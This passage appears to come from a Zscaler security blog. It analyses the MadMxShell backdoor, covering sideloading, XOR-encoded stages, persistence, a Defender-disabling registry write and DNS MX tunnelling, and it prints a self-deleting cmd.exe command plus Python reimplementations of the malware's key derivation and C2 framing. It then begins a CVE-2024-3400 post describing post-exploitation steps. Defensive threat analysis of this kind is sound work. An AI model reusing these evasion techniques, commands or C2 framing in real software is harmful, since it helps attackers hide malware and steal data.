- IVIEWERS.dll: a 22 MB DLL that contains the stage 2 payload. The DLL is padded with an unused 10 MB overlay, which keeps it above the size limit of security products that only scan files up to a certain size.

When Advanced-ip-scanner.exe is run, it sideloads IVIEWERS.dll, which executes a series of heavily obfuscated shellcodes extracted from various locations within the .rsrc section of the DLL. The final shellcode extracts and decodes an executable from resource AT21 of the DLL with the XOR key 5dsadas435235bgdsgdfbvb3253453425345gfdsgfdgdf and injects it into a new Advanced-ip-scanner.exe process via process hollowing.

Stage 2 dropper

The injected EXE contains the next stage payloads in resource ID 202, encoded with a hardcoded 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 and compressed with zlib. Each encoded byte in this resource is padded with seven null bytes, inflating it to a 10 MB file, likely as another anti-scanning technique. This is shown in the figure below.

Figure 4: The encoded and compressed stage 3 payload in the resource.

After decoding and decompressing the resource, two files, OneDrive.exe and Secur32.dll, are dropped into %LOCALAPPDATA%\Microsoft\OneDrive\Update. Before executing the dropped OneDrive.exe with ShellExecuteExW, the dropper deletes the stage 1 EXE with the following command. The for /l loop with a step of 0 never terminates on its own: each iteration waits roughly two seconds (ping -n 3 to localhost) and retries the delete until the file no longer exists, at which point it exits.

cmd.exe /C for /l %x in (0,0,0) do (ping -n 3 127.0.0.1 > NUL & for %p in ("<PATH>\Advanced-ip-scanner.exe") do (del /f /q %p & if not exist %p exit))

Stage 3 launcher

OneDrive.exe, a legitimate signed Microsoft EXE, is abused to sideload Secur32.dll, which sets up persistence for OneDrive.exe before executing the embedded stage 4 shellcode.
Data from Secur32.dll's icon resource ID 202 is XOR decoded to obtain the stage 4 shellcode, as shown in the figure below.

Figure 5: The icon resource with the encoded stage 4 payload.

The first 16 bytes of the resource hold an encoded key for the payload that follows. Each of the first 8 lowercase characters of the current process filename (onedrive) is added to every second byte of the encoded key to derive the XOR key F2 78 CD 9B 85 32 1D 07 33 C4 A0 21 98 A2 95 E3, as shown in the figure below. If Secur32.dll is sideloaded by anything other than OneDrive.exe, the derived key is wrong and the next stage does not decode correctly, which also frustrates analysis of the DLL in isolation.

Figure 6: Generating the XOR key to decode the stage 4 shellcode.

The malware then attempts to disable Windows Defender by setting HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware to 1 in the registry. On recent Defender platform versions this legacy value is deprecated and ignored, and Tamper Protection blocks changes to it, so the write is more useful as a detection signal than as a reliable bypass. The launcher then configures a scheduled task named "OneDrive Update" that executes %LOCALAPPDATA%\Microsoft\OneDrive\Update\OneDrive.exe when the current user logs on to Windows, before transferring control to the next stage.

Stage 4 backdoor

The shellcode is a backdoor that lets the threat actor collect system information, execute commands via cmd.exe, and perform basic file operations such as reading, writing, and deleting files. To deter analysis and detection, the malware decodes the code of each function with the 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 (the same key used in stage 2), calls the function, and immediately re-encodes it. In the figure below, the code excerpt on the right is decoded from the original bytes on the left. Even after decoding, the function must perform an additional decoding step on get_c2_domain before it can call it, and that function is re-encoded before execution continues. As a result there is never a fully decoded copy of the shellcode in memory at any point of execution, which defeats a naive memory dump.
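To make the stage 3 key derivation and the stage 4 decode/re-encode discipline concrete, here is an added example written for this article; it is not code from the MadMxShell sample or from the ThreatLabz post. The 16 encoded key bytes at the start of the resource are not given in the analysis, so ENCODED_KEY is reconstructed here by subtracting "onedrive" from every second byte of the stated derived key modulo 256; its first eight bytes turn out to match the 8-byte key F2 09 CD 2D 85 CD 1D A3 quoted for stages 2 and 4. The stage 4 payload bytes and the function body are constructed placeholders. The example shows that the same resource decodes correctly only when the host process is named OneDrive.exe, and emulates the per-function decode, call, re-encode pattern so that a body is in the clear only for the duration of its call.

```python
# 8-byte key quoted in the analysis for stages 2 and 4.
STAGE2_KEY = bytes.fromhex("F209CD2D85CD1DA3")

# Derived 16-byte key quoted in the analysis for a host process named OneDrive.exe.
DERIVED_KEY = bytes.fromhex("F278CD9B85321D0733C4A02198A295E3")

# Reconstructed here (not quoted from the sample): the stored encoded key, obtained by
# subtracting "onedrive" from every second byte of DERIVED_KEY modulo 256.
ENCODED_KEY = bytes.fromhex("F209CD2D85CD1DA33352A0B8982C957E")

# Constructed placeholder standing in for the stage 4 shellcode.
PAYLOAD = b"stage4-shellcode-placeholder-bytes"


def derive_key(encoded_key: bytes, process_filename: str) -> bytes:
    """Add each of the first 8 lowercase characters of the host process filename to
    every second byte of the 16-byte encoded key, wrapping at 256."""
    name = process_filename.lower().encode("ascii")[:8]
    key = bytearray(encoded_key)
    for i, c in enumerate(name):
        key[2 * i + 1] = (key[2 * i + 1] + c) & 0xFF
    return bytes(key)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call decodes and re-encodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_resource(payload: bytes) -> bytes:
    """Resource layout as described: 16 encoded key bytes, then the XOR-encoded payload."""
    return ENCODED_KEY + xor_with_key(payload, DERIVED_KEY)


def decode_stage4_resource(resource: bytes, host_process: str) -> bytes:
    """What Secur32.dll does: derive the key from its host process name, then decode."""
    key = derive_key(resource[:16], host_process)
    return xor_with_key(resource[16:], key)


class EncodedFunction:
    """Stage 4 keeps every function body XOR-encoded at rest and exposes the plaintext
    only while the function runs. `run` receives the decoded body and returns a result."""

    def __init__(self, body: bytes, key: bytes = STAGE2_KEY):
        self.key = key
        self.encoded = xor_with_key(body, key)

    def call(self, run):
        decoded = xor_with_key(self.encoded, self.key)
        try:
            return run(decoded)
        finally:
            # Re-encode immediately, so a dump taken between calls never sees the body.
            self.encoded = xor_with_key(decoded, self.key)


def demo() -> dict:
    """Exercise both mechanisms and report the observable outcomes."""
    res = build_resource(PAYLOAD)
    fn = EncodedFunction(b"get_c2_domain: return 'litterbolo.com'")
    seen = []

    def run(body: bytes) -> bytes:
        seen.append(body)            # plaintext is visible here, during the call only
        return body.split(b": ")[0]

    result = fn.call(run)
    return {
        "right_host": decode_stage4_resource(res, "OneDrive.exe") == PAYLOAD,
        "wrong_host": decode_stage4_resource(res, "explorer.exe") == PAYLOAD,
        "plaintext_at_rest": fn.encoded == seen[0],
        "call_result": result,
    }


if __name__ == "__main__":
    print(derive_key(ENCODED_KEY, "OneDrive.exe").hex().upper())
    print(demo())
```

The practical consequence for analysts is that dumping the shellcode from a running process yields mostly encoded bytes, and that running Secur32.dll under a differently named host (a sandbox renaming the sample, for instance) never reaches a working stage 4.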
Most sensitive strings and data, such as the C2 domain, the lookup table for encoding and decoding C2 communications, and the aforementioned XOR key, are also stored as stack strings to hinder analysis.

Figure 7: Function bytes before and after decoding. Note that the decoded function includes calls to decode and encode other functions called within it.

The malware generates a 4-byte session ID with the CryptGenRandom API and a victim ID by concatenating the hard disk serial number, computer name, and username and taking the first 8 bytes of the MD5 hash of the result.

C2 Protocol

The malware communicates with the C2 server, litterbolo[.]com, by sending requests and receiving commands encoded within DNS MX queries and responses. The malware supports the requests described in the table below.

Type | Name | Description
0 | Heartbeat | Indicates that the malware is ready to accept the next command.
1 | Registration | Sent as the first request of a session or when the C2 issues a re-registration command (type 1 command).
2 | Command acknowledgement | Acknowledges the receipt of C2 commands.
4 | System info command result | Contains system information collected for type 4 commands.
5 | Shell command result | Contains shell output for type 5 commands.
6 | File command result | Contains file and/or directory data for type 6 commands.

Table 1: The requests supported by the malware during C2 communication.

Figure 8: A diagram depicting the MadMxShell C2 communication loop.

For each session, the malware first sends a registration request (type 1) to the C2 server. Once the C2 server acknowledges the registration request, the malware sends a heartbeat request (type 0). The C2 server responds with any of the following commands.

Command Type | Subcommand | Description
0 | N/A | Sends a heartbeat.
1 | N/A | Re-register with C2.
2 | N/A | C2 acknowledges receipt of the specified packet and indicates that the malware should send the next packet (for request messages split into multiple packets).
4 | N/A | Collects system information: computer name, user name, Ethernet IP addresses, Windows OS version, processor name, display card name, RAM size.
5 | 0 | Start cmd.exe process.
5 | 1 | Terminate cmd.exe process.
5 | 2 | Execute command via the existing cmd.exe process created with subcommand 0.
6 | 0 | List files and directories if a path is specified, otherwise list all drives.
6 | 1 | Write or append content to a file.
6 | 2 | Read from a file.
6 | 3 | Delete a file or directory. Files are deleted with the DeleteFileW API, while directories are deleted with this command: cmd.exe /c rmdir "<DIR_NAME>" /s /q.

Table 2: The commands and subcommands supported by the malware.

The malware acknowledges each command with a command acknowledgement request (type 2) before executing it. After completing commands of types 4, 5, and 6, the malware sends the results to the C2 server. It then repeats the cycle by sending a heartbeat request (type 0) to retrieve the next command.

Data Encoding

The malware sends requests to the C2 server by encoding the data in the subdomain(s) of the Fully Qualified Domain Name (FQDN) of a DNS MX query. The C2 responds in kind, encoding its commands as subdomain(s) in the corresponding DNS MX response. Each byte of binary data is converted into a pair of alphanumeric characters using a custom encoding scheme based on a hardcoded 36-character lookup table. Blocks of 60 alphanumeric characters are separated by a "." character to form the subdomain labels. Python code for decoding these subdomains into the original request and C2 messages can be found in our GitHub repository.

Because the malware uses at most 224 characters for the FQDN and the C2 domain name itself cannot carry data, each DNS packet can transfer at most 103 bytes. Requests and commands that exceed this size are split across multiple DNS packets, sent sequentially after the other party has acknowledged receipt of the previous packet.
Possibly because of the limited bandwidth of the C2 protocol, the malware is configured with a relatively short interval (3 seconds) between requests. As a result its C2 traffic is considerably noisier than that of typical malware using HTTP for C2: a host issuing MX queries every few seconds for long, unique subdomains of a single domain is itself a usable detection signal.

Commands received from the C2 (after decoding) are structured as shown in the table below.

Offset | Length | Name | Description
0x0 | 4 | Query number | Starts from 0 per session.
0x4 | 4 | Checksum | Adler-32 checksum of the entire message data.
0x8 | 4 | Packet number | A single message may be split into multiple packets. Starts from 0 for each message.
0xC | 4 | Message length | Total length of the message. This field is only present in the first packet of a message.
0x10 | Varies | Message data | The first byte of the message contains the command ID. The structure of the subsequent bytes differs slightly for each command type.

Table 3: The C2 message structure.

For example, the C2 server for this sample always responds with 33qqooggxr77mdxx88jj6600ev44yyzz9bee99wwuu.litterbolo.com upon receiving a registration request. This decodes to 00 00 00 00 03 00 0f 00 00 00 00 00 05 00 00 00 02 00 00 00 00 and, reading the fields as little-endian, represents the following message:

Query number: 0
Checksum: 0xF0003
Packet number: 0
Message length: 5
Data: 02 00 00 00 00 (an acknowledgement from the C2 that it received packet 0)

Likewise, the requests sent to the C2 server (before encoding) are structured as shown in the table below.

Offset | Length | Name | Description
0x0 | 4 | Session ID | An ID randomly generated when the malware is started.
0x4 | 8 | Victim ID | The first 8 bytes of an MD5 hash of the hard disk serial number, computer name, and user name.
0xC | 4 | Query number | Starts from 0 per session and is incremented for each DNS query sent to the C2 server.
0x10 | 4 | Checksum | The Adler-32 checksum of the entire message data.
0x14 | 4 | Packet number | A single message may be split into multiple packets. Starts from 0 for each message.
0x18 | 4 | Message length | Total length of the message. This field is only present in the first packet of a message.
0x1C | Varies | Message data | The first byte of the message contains the request type. Data for the specific request follows it (for example, system information for request type 4).

Table 4: The request message structure.

Observed Commands

During our investigation, we observed the backdoor receiving the following commands from the C2 server:

- Collect system information (command type 4).
- Run systeminfo and ipconfig via cmd.exe (command type 5).
- Enumerate drives and specific directories, particularly the Windows system directory and user directories (command type 6).

Some of the commands were received 60 to 90 minutes after the backdoor registered with the C2 server, which may indicate an anti-analysis technique to outlast sandboxes or actual hands-on activity by the threat actor. Based on the capabilities of the stage 4 backdoor and the commands collected, we believe the attacker is likely interested in harvesting and exfiltrating information from infected machines. By focusing on IT teams, this threat actor can reach users with privileged access to sensitive systems (e.g., domain controllers), which can lead to a significant breach.

Infrastructure Details

Our analysis started with the domain advansed-ip-scanner[.]net, which was live at the time of analysis and serving a payload. WHOIS information for this domain revealed the attacker's registration email address to be [email protected]. A reverse WHOIS lookup on this email address revealed 45 domains registered between November 2023 and March 2024 to spoof various network scanning and IT management software. The complete list of domains used for malware distribution is provided in the IOCs section at the end of this blog.
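As an added example written for this article (it is not the ThreatLabz GitHub decoder, which uses the malware's real lookup table), the following reproduces the C2 framing described above in Python: the 60-character label split and the 224-character FQDN budget that yields 103 bytes per query, the Table 3 command layout with its Adler-32 check applied to the registration acknowledgement quoted above, and the Table 4 request layout with a message split across packets. The byte-to-character mapping is a stand-in base-36 digit pair, since the malware's 36-character table is not reproduced in the post, so this code will not decode captured MadMxShell traffic. The victim-ID concatenation (no separator) and the assumption that the 103-byte per-packet budget includes the header are also mine, as are the sample session and host values.

```python
import hashlib
import struct
import zlib

C2_DOMAIN = "litterbolo.com"
FQDN_LIMIT = 224      # maximum FQDN length the malware uses
LABEL_LEN = 60        # alphanumeric characters per subdomain label
PACKET_BYTES = 103    # raw bytes per DNS packet (assumption: header included)

# Stand-in pair encoding (assumption): a plain base-36 digit pair per byte. The malware's
# hardcoded 36-character table is different and not reproduced in the analysis.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"

# Decoded registration acknowledgement quoted in the analysis (little-endian fields).
SAMPLE_ACK = bytes.fromhex("00 00 00 00 03 00 0f 00 00 00 00 00 05 00 00 00 02 00 00 00 00")


def encode_pairs(data: bytes) -> str:
    return "".join(ALPHABET[b // 36] + ALPHABET[b % 36] for b in data)


def decode_pairs(text: str) -> bytes:
    v = [ALPHABET.index(c) for c in text]
    return bytes(v[i] * 36 + v[i + 1] for i in range(0, len(v), 2))


def to_fqdn(raw: bytes, domain: str = C2_DOMAIN) -> str:
    """Encode raw bytes, split into 60-character labels, append the C2 domain."""
    enc = encode_pairs(raw)
    labels = [enc[i:i + LABEL_LEN] for i in range(0, len(enc), LABEL_LEN)]
    return ".".join(labels + [domain])


def from_fqdn(fqdn: str, domain: str = C2_DOMAIN) -> bytes:
    if not fqdn.endswith("." + domain):
        raise ValueError("not a query for the C2 domain")
    return decode_pairs(fqdn[: -len(domain) - 1].replace(".", ""))


def max_payload_bytes(domain: str = C2_DOMAIN, limit: int = FQDN_LIMIT) -> int:
    """Largest raw byte count whose encoded FQDN (labels, dots, domain) fits in `limit`."""
    n = 0
    while len(to_fqdn(bytes(n + 1), domain)) <= limit:
        n += 1
    return n


def parse_c2_command(raw: bytes) -> dict:
    """Parse a decoded C2 -> malware packet (Table 3 layout)."""
    query_no, checksum, packet_no = struct.unpack_from("<III", raw, 0)
    if packet_no == 0:
        (msg_len,) = struct.unpack_from("<I", raw, 12)
        body = raw[16:]
    else:
        msg_len, body = None, raw[12:]
    # Adler-32 covers the whole message; a single-packet message can be verified directly.
    complete = packet_no == 0 and msg_len == len(body)
    return {"query_no": query_no, "checksum": checksum, "packet_no": packet_no,
            "msg_len": msg_len, "command_type": body[0] if body else None, "data": body,
            "checksum_ok": complete and zlib.adler32(body) == checksum}


def victim_id(disk_serial: str, computer: str, user: str) -> bytes:
    # Concatenation order per the analysis; joining without a separator is an assumption.
    return hashlib.md5((disk_serial + computer + user).encode()).digest()[:8]


def build_request_packets(session_id: bytes, vid: bytes, query_no: int, message: bytes) -> list:
    """Frame a malware -> C2 message per Table 4, splitting so each raw packet stays within
    PACKET_BYTES. The query number advances by one per packet (each packet is one DNS query)."""
    checksum = zlib.adler32(message)
    packets, offset, packet_no = [], 0, 0
    while True:
        hdr = struct.pack("<4s8sIII", session_id, vid, query_no + packet_no, checksum, packet_no)
        if packet_no == 0:
            hdr += struct.pack("<I", len(message))   # message length only in the first packet
        chunk = message[offset:offset + PACKET_BYTES - len(hdr)]
        packets.append(hdr + chunk)
        offset += len(chunk)
        if offset >= len(message):
            return packets
        packet_no += 1


def reassemble_request(packets: list) -> bytes:
    """Strip the Table 4 headers (28 bytes on the first packet, 24 on the rest) and rejoin."""
    return b"".join(p[28:] if i == 0 else p[24:] for i, p in enumerate(packets))


if __name__ == "__main__":
    print("bytes per query:", max_payload_bytes())
    print("sample ack:", parse_c2_command(SAMPLE_ACK))
    pk = build_request_packets(b"\x01\x02\x03\x04", victim_id("ABCD1234", "WS01", "alice"), 0, bytes(200))
    print([len(p) for p in pk], [to_fqdn(p)[:40] + "..." for p in pk])
```

The arithmetic in max_payload_bytes is the check a practitioner wants: 103 bytes encode to 206 characters, which split into labels of 60, 60, 60 and 26 characters; with three dots and ".litterbolo.com" that is exactly 224 characters, and one more byte would push the FQDN over the budget.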
These domains were hosted on servers used exclusively by the threat actor and belonged to the ASNs below:

- AS208312 (REDBYTES, RU)
- AS16276 (OVH, FR)

The C2 domain litterbolo[.]com used a dedicated nameserver, since the malware abuses the DNS protocol itself for C2 communication and the server must answer the MX queries.

OSINT Research

Further Open-Source Intelligence (OSINT) research turned up two accounts created by the threat actor on criminal underground forums, blackhatworld[.]com and social-eng[.]ru, using the email address [email protected]. On the blackhatworld[.]com forum, the threat actor made two posts in a thread in which someone offered methods to bypass the Google Adsense threshold. This aligns with the Google Ads abuse the threat actor relied on for their own malvertising campaign. The figures below show the two posts, in which the threat actor expresses interest in the technique and asks to enroll in the course.

Figure 9: Posts made by the threat actor showing interest in the Google Ads abuse course.

Google Ads threshold accounts, and techniques for abusing them, are frequently traded on black hat forums. They typically give the threat actor a way to accrue as much ad spend as possible without paying until the account's billing threshold is reached. A reasonably high threshold lets the threat actor run an ad campaign for a significant amount of time; once the threshold has been reached, they repeat the process with a new Google Ads account. Threat actors often use virtual credit cards (VCC) together with residential proxies to verify these Google Ads accounts, and employ various methods to spend them up to the maximum threshold. This approach lets threat actors run long-lasting malvertising campaigns at low cost while avoiding account suspension.
Conclusion

The threat discussed in this blog demonstrates advanced tactics, techniques, and procedures (TTPs) and a keen interest in users on IT security and network administration teams. The threat actor put significant effort into remaining undetected by evading memory forensics and network security controls. While we cannot currently attribute this activity to any known threat actor, we continue to monitor developments associated with it and to ensure the necessary protections are in place for our customers. We also advise users to follow security best practices and exercise caution when clicking links in Google search results, and to download software only from the developer's official website.

Zscaler Coverage

Figure 10: Zscaler sandbox detection report

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to MadMxShell at various levels with the following threat name:

Win32.Backdoor.MadMxShell

Indicators Of Compromise (IOCs)

File indicators

SHA256 Hash | Filename | Description
7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015 | Advanced-ip-scanner.zip | The ZIP archive served by the malicious sites; contains Advanced-ip-scanner.exe and IVIEWERS.dll.
0263663c5375289fa2550d0cff3553dfc160a767e718a9c38efc0da3d7a4b626 | Advanced-ip-scanner.exe | Renamed oleview.exe, a legitimate Microsoft binary that is vulnerable to DLL sideloading.
722a44f6a4718d853d640381e77d1b9815d6f1663603859ff758ded896860cba | IVIEWERS.dll | The malicious DLL sideloaded by oleview.exe.
bae2952c7d120d882746658e6d128556ae2498005072c4b7d7590a964b93c315 | (none) | IVIEWERS.dll without the overlay.
6de01c65c994e0e428f5043cb496c8adca96ba18dfd2953335d1f3c9b97c60c5 | (none) | The stage 2 dropper EXE.
9bba4c707de5a66d8c47e3e18e575d43ba8011302dad452230c4b9d6b314ee26 | OneDrive.exe | The legitimate Microsoft binary that is vulnerable to DLL sideloading.
287a0a80a995f1e62b317cf5faa1db94af6ee9132b0f8483afbd6819aa903d31 | Secur32.dll | The malicious DLL sideloaded by OneDrive.exe.
b5162497bc2b9f1956d2145dd32daa5c99d6803544a0254a9090237628168d94 | (none) | Icon resource ID 202 in Secur32.dll, which contains the encoded stage 4 backdoor.
105e9a8d1014d2939e6b0ada3f24ad4bb6bd21f0155c284c90c7675a1de9d193 | (none) | The stage 4 backdoor.

Network indicators

Malware distribution sites

advaanced-ip-scanner[.]com
advaanced-ip-scanner[.]net
advanceb-ip-scanner[.]com
advanceb-lp-scanner[.]com
advanced-ip-saaner[.]com
advanced-ip-scaaner[.]com
advanced-ip-scaer[.]com
advanced-ip-scaer[.]net
advanced-ip-scanel[.]com
advanced-ip-scanel[.]net
advanced-ip-scanerr[.]com
advanced-ip-scanerr[.]net
advanced-ip-scanir[.]com
advanced-ip-scanir[.]net
advanced-ip-scanr[.]com
advanced-ip-scanr[.]net
advanced-ip-scanz[.]com
advanced-ip-scanz[.]net
advanced-lp-saanel[.]com
advanced-lp-saaner[.]com
advanced-lp-scanel[.]com
advanced-lp-scannel[.]com
advansed-ip-scanner[.]com
advansed-ip-scanner[.]net
advvanced-ip-scanner[.]com
advvanced-ip-scanner[.]net
angryipscan[.]net
angryipscaner[.]com
ipscannerprtg[.]com
keystore-explore[.]com
manageeengines[.]com
manageeengines[.]net
managengines[.]com
managengines[.]net
managengins[.]com
managengins[.]net
networkipscan[.]com
networkscanip[.]com
paesslers[.]com
prtgscan[.]com

C2 server

litterbolo[.]com

Google Ads links

Date | Google Ads link | Destination
March 5th 2024 | www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiN35j_vN2EAxUzGYMDHX4hA34YABABGgJzZg&ae=2&gclid=CjwKCAiAopuvBhBCEiwAm8jaMSAMzoon4dwGsotmQqrkJiOZVKq2nqUgh4h5tTNSLoOP21tibW_TXhoCmoYQAvD_BwE&ohost=www.google.com&cid=CAESVuD2_iSgJRfDJt5uaZ40PZqKlvgj6FO_6U_lr2TzogbqxMcQ-ID9Ciigvk2r4moSqJy-sawYk6hXUSYF7tgUuXPomWtbdnxcslhQNTVii1zjoR-Akmds&sig=AOD64_0RP5d4p4sMCY2XYek62uAF3iWaHQ&q&adurl&ved=2ahUKEwjH15L_vN2EAxVAyqACHRqDBBAQ0Qx6BAgHEAE | ipscannerprtg[.]com
March 5th 2024 | www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiStfbWpN6EAxVNS38AHbFZBN4YABACGgJvYQ&ase=2&gclid=EAIaIQobChMIkrX21qTehAMVTUt_AB2xWQTeEAAYAyAAEgILlvD_BwE&ohost=www.google.com&cid=CAASJeRo7dvz3CKRm4e4EhXJr2_o-d0_haudokhbkZ505hq6nEa2JOQ&sig=AOD64_3TPRDNISW_jutcN1faBIQQxDOshw&q&nis=6&adurl&ved=2ahUKEwj5q-_WpN6EAxXKL9AFHb3ID4cQ0Qx6BAgEEAE | keystore-explore[.]com
March 8th 2024 | www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjdlN6o3-SEAxVxgoMHHfe-BLIYABACGgJlZg&ase=2&gclid=CjwKCAiAi6uvBhADEiwAWiyRdhpRojhqTPETT3LIoSFRMYLK6PuHStezGHN2xQlXKluURhxieDQGLxoCrdkQAvD_BwE&ohost=www.google.com&cid=CAESVeD2KYxlP2QHuBG9qmLbwT1GsTtxSB9PtbXdt4kQsa_2gvy1Qp0FMaYcMP1wiS7KRVMjU7NX251AxcmT8WLG6KWPCEjLCDv-1uTWiNDdH2fHVm4rXzA&sig=AOD64_0Gk_XdMlDdW3N22zV8ASopY0pLow&q&nis=6&adurl&ved=2ahUKEwi969ao3-SEAxXChP0HHX2IBWsQ0Qx6BAgIEAE | prtgscan[.]com

MITRE ATT&CK Framework

ID | Technique | Description
T1583.001 | Acquire Infrastructure: Domains | The threat actor registered typosquatting domains and set up fake websites masquerading as legitimate software websites to deliver malware.
T1583.002 | Acquire Infrastructure: DNS Server | The threat actor configured a DNS server at litterbolo[.]com for C2 communication.
T1583.008 | Acquire Infrastructure: Malvertising | The threat actor leveraged Google malvertising, targeting search keywords related to IP and port scanners to lure users to malicious sites.
T1204.002 | User Execution: Malicious File | The attack chain is started by the user when they execute the fake Advanced-ip-scanner.exe file.
T1574.002 | Hijack Execution Flow: DLL Side-Loading | The threat actor leveraged two stages of DLL sideloading to execute the final payload.
T1055.012 | Process Injection: Process Hollowing | The threat actor employs process hollowing to inject and execute the stage 2 dropper EXE.
T1562.001 | Impair Defenses: Disable or Modify Tools | The stage 3 launcher attempts to disable Windows Defender.
T1070.004 | Indicator Removal: File Deletion | The stage 2 dropper runs a command via cmd.exe to delete the stage 1 EXE from disk.
T1053.005 | Scheduled Task/Job: Scheduled Task | The stage 3 launcher configures a scheduled task for persistence.
T1036.004 | Masquerading: Masquerade Task or Service | The scheduled task masquerades as a OneDrive update to execute OneDrive.exe for malware persistence.
T1036.005 | Masquerading: Match Legitimate Name or Location | OneDrive.exe and Secur32.dll are dropped to a subdirectory of %LOCALAPPDATA%\Microsoft\OneDrive, which is used by the legitimate OneDrive application.
T1027.001 | Obfuscated Files or Information: Binary Padding | IVIEWERS.dll is padded with 10 MB of null bytes to inflate the file size, evading security products that have a file size limit for analysis.
T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | Multiple stages use ROR13 API hashing based on the uppercase names of the APIs.
T1027.009 | Obfuscated Files or Information: Embedded Payloads | The next stage payloads are XOR encoded in the resources of stages 1 to 3.
T1082 | System Information Discovery | MadMxShell's C2 command types 4 and 5 were used to enumerate system information and transmit it to the attacker's C2 server.
T1083 | File and Directory Discovery | MadMxShell's C2 command type 6 was used to enumerate files and directories on the infected machine.
T1033 | System Owner/User Discovery | MadMxShell sends the current username as part of the information collected by command type 4.
T1005 | Data from Local System | MadMxShell can read files on the infected machine when C2 command type 6 is issued.
T1071.004 | Application Layer Protocol: DNS | MadMxShell abuses DNS MX queries to establish C2 communication with the C2 server.
T1132.002 | Data Encoding: Non-Standard Encoding | C2 traffic uses a custom encoding based on a lookup table.
T1572 | Protocol Tunneling | The C2 protocol encodes data within MX queries and responses of the DNS protocol.
T1041 | Exfiltration Over C2 Channel | The collected data is exfiltrated via C2 communications.

Appendix

Visit our GitHub repository to
access the Python script to decode C2 traffic. Wed, 17 Apr 2024 08:25:13 -0700 Roy Tay https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust https://www.zscaler.com/blogs/security-research/another-cve-pan-os-zero-day-another-reason-consider-zero-trust A Year of Critical Zero Days: Firewalls, VPNs, and more This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets — a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network — specifically VPNs and Firewalls. Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network’s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. 
It does this by making enterprises’ assets, applications, servers, devices, and more invisible to attackers — hiding them behind a cloud-proxy architecture — while entirely eliminating the need for the VPN and firewall products that are such frequent targets of attack.

Attack Chain

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.

Attack Scenario

The following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers.

- Initial Exploitation: the attackers scan for and exploit the command injection vulnerability.
- Persistence: a cron job is used to download additional tools, including UPSTYLE, a Python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).
- Execution: commands are downloaded and executed from a remote location by piping wget output to bash.
- Lateral Movement: in at least one case, attackers pivoted internally across the affected networks via SMB and WinRM.
- Collection: the adversary attempted to obtain the domain backup DPAPI keys and targeted Active Directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users’ DPAPI keys. Next, the attacker copied configuration data from the firewall device. Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised, which enabled the attacker to obtain the browser master key and decrypt sensitive data.
- Exfiltration: the stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.

Vendor Recommendations

Update 04/15/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3.
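The practical question for a defender on the day of this disclosure is which of their firewalls still sit below the hotfix releases named above. The following is an added example, not code from the original post or from Palo Alto Networks: a small Python check that parses PAN-OS version strings of the form major.minor.maintenance[-hN], compares them against the three fixed releases listed for CVE-2024-3400, and triages a constructed inventory. The hostnames and versions in SAMPLE_INVENTORY are hypothetical, the comparison reads the published "affected if less than" thresholds literally (so a later maintenance release on a listed train counts as fixed), and any train the table does not cover is reported as "not listed" rather than guessed.

```python
import re
from typing import Dict, List, Tuple

# Fixed hotfix release per PAN-OS train for CVE-2024-3400, as published in the post:
# 11.1 affected below 11.1.2-h3, 11.0 below 11.0.4-h1, 10.2 below 10.2.9-h1.
FIXED_VERSIONS: Dict[Tuple[int, int], str] = {
    (11, 1): "11.1.2-h3",
    (11, 0): "11.0.4-h1",
    (10, 2): "10.2.9-h1",
}

# PAN-OS versions look like "11.1.2" or "11.1.2-h3" (maintenance release plus optional hotfix).
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(version: str) -> Tuple[int, int, int, int]:
    """Parse "11.1.2-h3" into the comparable tuple (11, 1, 2, 3).

    A release with no hotfix suffix gets hotfix number 0, so it sorts below
    every hotfix of the same maintenance release ("11.0.4" < "11.0.4-h1").
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def cve_2024_3400_status(version: str) -> str:
    """Return "vulnerable", "fixed" or "not listed" for one PAN-OS version.

    Only the three trains in the published table are judged. Any other train is
    reported as "not listed" so the operator consults the vendor advisory
    instead of assuming it is safe.
    """
    parsed = parse_panos_version(version)
    fixed = FIXED_VERSIONS.get(parsed[:2])
    if fixed is None:
        return "not listed"
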